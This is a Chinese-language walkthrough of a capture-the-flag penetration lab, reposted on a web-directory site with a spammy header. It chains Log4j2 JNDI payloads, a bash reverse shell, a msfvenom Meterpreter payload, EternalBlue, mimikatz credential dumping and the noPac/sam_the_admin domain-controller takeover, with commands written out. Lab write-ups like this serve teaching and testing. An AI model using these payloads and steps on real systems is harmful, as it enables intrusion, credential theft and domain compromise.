日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長(zhǎng)提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請(qǐng)做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會(huì)員:747

外網(wǎng)打點(diǎn)

首先對(duì)web進(jìn)行端口掃描,發(fā)現(xiàn)38080端口和22端口

分享一次靶場(chǎng)滲透

 

訪問(wèn)一下38080端口發(fā)現(xiàn)是一個(gè)error page

分享一次靶場(chǎng)滲透

 

用WAppalyzer看一下是什么架構(gòu),但是好像沒(méi)有檢測(cè)出來(lái)

分享一次靶場(chǎng)滲透

 

拿著報(bào)錯(cuò)去百度上發(fā)現(xiàn)應(yīng)該是springboot

分享一次靶場(chǎng)滲透

 

索性用goby再去掃一下,應(yīng)該是spring沒(méi)錯(cuò),但是沒(méi)有漏洞是什么操作?聯(lián)想到最近出的log4j2的洞,可能他只是一個(gè)日志文件所以并沒(méi)有框架

分享一次靶場(chǎng)滲透

 


分享一次靶場(chǎng)滲透

 

使用payload=${
jndi:ldap://p9j8l8.DNSlog.cn}驗(yàn)證一下有回顯證明存在漏洞

分享一次靶場(chǎng)滲透

 

嘗試進(jìn)一步利用漏洞,首先起一個(gè)ldap服務(wù),ip為本地接收shell的ip地址

JAVA -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105
分享一次靶場(chǎng)滲透

 

抓包修改Content-Type:
appllication/x-www-form-urlencoded,并執(zhí)行以下payload成功回顯

payload=${jndi:ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho}
分享一次靶場(chǎng)滲透

 

執(zhí)行l(wèi)s -al /看一下也成功

分享一次靶場(chǎng)滲透

 

nc開(kāi)啟監(jiān)聽(tīng)端口

分享一次靶場(chǎng)滲透

 

然后使用bash命令反彈,這里需要先base64編碼然后對(duì)編碼后的特殊字符進(jìn)行2層url轉(zhuǎn)碼

bash -i >& /dev/tcp/192.168.1.105/9999 0>&1

抓包添加payload=${
jndi:ldap:1/192.168.199.140:1389/TomcatBypass/Command/Base64/二層轉(zhuǎn)碼之后的字符},即可得到反彈shell

分享一次靶場(chǎng)滲透

 

進(jìn)行信息搜集發(fā)現(xiàn)為Docker環(huán)境,這里嘗試了docker逃逸失敗,那么繼續(xù)進(jìn)行信息搜集

分享一次靶場(chǎng)滲透

 

在根目錄下找到了第一個(gè)flag,這里有一個(gè)got this,在之前端口掃描的時(shí)候看到開(kāi)放了22端口,嘗試使用ssh直接連接

分享一次靶場(chǎng)滲透

 

使用xshell嘗試連接

分享一次靶場(chǎng)滲透

 

連接成功,拿到了宿主機(jī)的權(quán)限

分享一次靶場(chǎng)滲透

 

內(nèi)網(wǎng)滲透

ifconfig查看網(wǎng)卡情況發(fā)現(xiàn)還有一張10.0.1.0/24段的網(wǎng)卡

分享一次靶場(chǎng)滲透

 

這里方便的話其實(shí)可以使用cs上線linux后用cs繼續(xù)打,這里我就沒(méi)有上線cs,使用linux的命令對(duì)10.0.1.0/24段探測(cè)存貨主機(jī)

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done
分享一次靶場(chǎng)滲透

 

ping一下是存活的

分享一次靶場(chǎng)滲透

 

使用毒液把流量代理出來(lái),首先開(kāi)啟監(jiān)聽(tīng)

admin.exe -lport 7777
分享一次靶場(chǎng)滲透

 

然后上傳agent_linux到靶機(jī)上

分享一次靶場(chǎng)滲透

 

加權(quán)并執(zhí)行

chmod 777 agent_linux_x86
agent_linux_x86 -rhost 192.168.1.105 -rport 7777
分享一次靶場(chǎng)滲透

 

連接成功

分享一次靶場(chǎng)滲透

 

這里本來(lái)準(zhǔn)備用毒液的代理到msf打的,后面覺(jué)得比較麻煩,就直接用kali生成的elf馬上線msf了

分享一次靶場(chǎng)滲透

 

首先生成一個(gè)32位的elf馬

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
分享一次靶場(chǎng)滲透

 

然后加權(quán)并執(zhí)行

chmod 777 shell.elf

./shell
分享一次靶場(chǎng)滲透

 

kali使用exploit/multi/handler進(jìn)行監(jiān)聽(tīng)

分享一次靶場(chǎng)滲透

 

獲取到宿主機(jī)的shell

分享一次靶場(chǎng)滲透

 

然后添加10.0.1.0/24段的路由

bg

route add 10.0.1.0 255.255.255.0 1
route print
分享一次靶場(chǎng)滲透

 

然后配置proxychain4.conf文件并使用socks模塊

search socks
use auxiliary/sevrer/socks_proxy
run
分享一次靶場(chǎng)滲透

 

我們?cè)谥耙呀?jīng)知道了內(nèi)網(wǎng)主機(jī)的ip,那么這里我們直接使用proxychain配合nmap對(duì)10.0.1.7的端口進(jìn)行掃描

proxychains4 nmap -sT -Pn 10.0.1.7
分享一次靶場(chǎng)滲透

 

發(fā)現(xiàn)有445端口,那么對(duì)445端口進(jìn)一步掃描

分享一次靶場(chǎng)滲透

 

先確定一下系統(tǒng)版本,使用
auxiliary/scanner/smb/smb_version模塊,發(fā)現(xiàn)是win7 sp1

分享一次靶場(chǎng)滲透

 

看能不能利用永恒之藍(lán),這里使用到
auxiliary/scanner/smb/smb_ms17_010模塊,發(fā)現(xiàn)可以利用永恒之藍(lán)

分享一次靶場(chǎng)滲透

 

使用
exploit/windows/smb/ms17_010_eternalbule模塊,因?yàn)槭遣怀鼍W(wǎng)環(huán)境,這里需要用到bind_tcp載荷

分享一次靶場(chǎng)滲透

 

run之后拿到一個(gè)system權(quán)限的meterpreter

分享一次靶場(chǎng)滲透

 

在C:UsersrootDesktop下拿到第二個(gè)flag

分享一次靶場(chǎng)滲透

 

然后繼續(xù)進(jìn)行信息搜集,發(fā)現(xiàn)同樣是雙網(wǎng)卡,還存在10.0.0.0/24段的一張網(wǎng)卡

分享一次靶場(chǎng)滲透

 

ipconfig /all看到dns服務(wù)器為redteam.lab應(yīng)該在域內(nèi)

分享一次靶場(chǎng)滲透

 

這里ping一下redteam.lab得到域控的ip為10.0.0.12

分享一次靶場(chǎng)滲透

 

這里不知道域控有什么洞,先上傳一個(gè)mimikatz把密碼抓取出來(lái),得到Administrator/Admin12345,這里其實(shí)就可以使用域管賬戶ipc直接連接,但是這里抓到了一個(gè)域用戶,嘗試使用最新的CVE-2021-42287、CVE-2021-42278來(lái)進(jìn)行攻擊,關(guān)于漏洞的原理請(qǐng)移步

privilege::debug
sekurlsa::logonpasswords
分享一次靶場(chǎng)滲透

 


分享一次靶場(chǎng)滲透

 

這里我準(zhǔn)備使用noPac.exe直接去獲取一個(gè)shell的,但是這里noPac.exe的利用條件是需要主機(jī)上有.net4.0環(huán)境,所以這里沒(méi)有回顯

noPac.exe下載地址:
https://github.com/cube0x0/noPac

分享一次靶場(chǎng)滲透

 

本來(lái)準(zhǔn)備一步一步的用原始的方法打的,但是powershell用不了沒(méi)有回顯,就寫(xiě)一下原始利用的步驟吧

首先創(chuàng)建一個(gè)機(jī)器賬戶,可以使用 impacket 的 addcomputer.py或是powermadaddcomputer.py是利用SAMR協(xié)議創(chuàng)建機(jī)器賬戶,這個(gè)方法所創(chuàng)建的機(jī)器賬戶沒(méi)有SPN,所以可以不用清除

清除機(jī)器賬戶的servicePrincipalName屬性

將機(jī)器賬戶的sAmaccountName,更改為DC的機(jī)器賬戶名字,注意后綴不帶$

為機(jī)器賬戶請(qǐng)求TGT

將機(jī)器賬戶的sAMAccountName更改為其他名字,不與步驟3重復(fù)即可

通過(guò)S4U2self協(xié)議向DC請(qǐng)求ST

進(jìn)行 DCsync Attack

分享一次靶場(chǎng)滲透

 

這里直接使用sam_the_admin.py進(jìn)行攻擊

proxychains Python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell
分享一次靶場(chǎng)滲透

 

即可拿到DC的shell

分享一次靶場(chǎng)滲透

 

在C:UsersAdministratorDesktop下找到最后一個(gè)flag

分享一次靶場(chǎng)滲透

 

分享到:
標(biāo)簽:靶場(chǎng) 滲透
用戶無(wú)頭像

網(wǎng)友整理

注冊(cè)時(shí)間:

網(wǎng)站:5 個(gè)   小程序:0 個(gè)  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會(huì)員

趕快注冊(cè)賬號(hào),推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過(guò)答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫(kù),初中,高中,大學(xué)四六

運(yùn)動(dòng)步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動(dòng)步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績(jī)?cè)u(píng)定2018-06-03

通用課目體育訓(xùn)練成績(jī)?cè)u(píng)定